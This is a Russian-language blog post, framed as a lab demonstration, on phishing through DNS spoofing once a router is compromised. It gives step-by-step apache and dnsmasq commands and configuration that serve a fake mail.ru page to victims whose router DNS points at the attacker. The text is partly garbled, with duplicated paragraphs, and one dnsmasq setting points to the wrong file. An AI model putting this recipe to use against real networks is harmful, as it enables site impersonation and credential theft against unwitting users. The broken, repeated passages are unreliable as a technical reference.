Допустим, что кто то получил доступ к нашему роутеру. В таком случае, если этот кто-то злобный "хацкер", то он может осуществить такую атаку, как фишинг через подмену DNS. Далее я покажу как в лабораторных условиях, можно осуществить подобную атаку.
Итак приступим. На машине атакующего будем использовать HTTP сервер apache и DNS сервис dnsmasq, все это добро есть в Kali. Далее можно создать несколько виртуальных хостов, но для примера создадим один хост. Например атакующий хочет перехватить доменное имя сайта mail.ru и перенаправить жертву на свой сервер, то для этого нам понадобится создать следующую директорию для виртуального хоста:
ServerName - основное имя домена
ServerAlias - дополнительное имя, по которому будет доступен сайт
DocumentRoot - папка с документами для этого домена
ErrorLog - логи ошибок
CustomLog - логи доступа
Сохраняемся и выходим из vi (нажимаем клавишу ESC и вводим команду :wq)
Далее нам нужно сопоставить наше имя нового хоста с IP адресом нашего сервера где запущен apache. Это можно сделать добавив запись в файл: /etc/hosts. А если мы не хотим трогать файл /etc/hosts, то создадим отдельный файл
Итак приступим. На машине атакующего будем использовать HTTP сервер apache и DNS сервис dnsmasq, все это добро есть в Kali. Далее можно создать несколько виртуальных хостов, но для примера создадим один хост. Например атакующий хочет перехватить доменное имя сайта mail.ru и перенаправить жертву на свой сервер, то для этого нам понадобится создать следующую директорию для виртуального хоста:
mkdir /var/www/mail.ru
В этой папке создаем фейковую страницу (самую простую для примера):echo '<html><h1>mail.ru</h1></html>' > index.html
Создаем виртуальный хост для апача. Для этого создаем при помощи редактора vi такой конфиг:vi /etc/apache2/sites-available/mail.ru.conf
нажимаем клавишу i и прописываем в нем следующее:<VirtualHost *:80>
ServerName mail.ru
ServerAlias www.mail.ru
DocumentRoot /var/www/mail.ru
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
где ServerName - основное имя домена
ServerAlias - дополнительное имя, по которому будет доступен сайт
DocumentRoot - папка с документами для этого домена
ErrorLog - логи ошибок
CustomLog - логи доступа
Сохраняемся и выходим из vi (нажимаем клавишу ESC и вводим команду :wq)
Далее нам нужно сопоставить наше имя нового хоста с IP адресом нашего сервера где запущен apache. Это можно сделать добавив запись в файл: /etc/hosts. А если мы не хотим трогать файл /etc/hosts, то создадим отдельный файл
vi /etc/dnsmasq.hosts
и пропишем адрес и доменное имя в нем
192.168.0.99 mail.ru
Настроим dnsmasq. Для этого создадим конфиг файл для dnsmasq
vi /etc/dnsmasq.conf
и пропишем такие настройки:#Если не хотим использовать /etc/hosts
no-hosts
#Наш файл с хостами
addn-hosts= "/etc/dnsmasq.conf"
Теперь надо запустить апач, делается это командой:
systemctl start apache2
Если апач запущен, то нужно сначала активировать созданный хост командой:a2ensite mail.ru
А затем надо перезагрузить сам апач:systemctl reload apache2
Далее запускаем сконфигурированный DNS сервис и передаем ключи для просмотра логов в терминале:dnsmasq --no-daemon --log-queries
Теперь все готово для фишинга.
Заходим на наш роутер и прописываем в настройках DNS - IP адрес машины где крутится dnsmasq. Теперь, с компьютера жертвы, который подключен к нашему роутеру пробуем зайти через браузер на сайт mail.ru, но попадаем на фейковую страницу.
Комментариев нет:
Отправить комментарий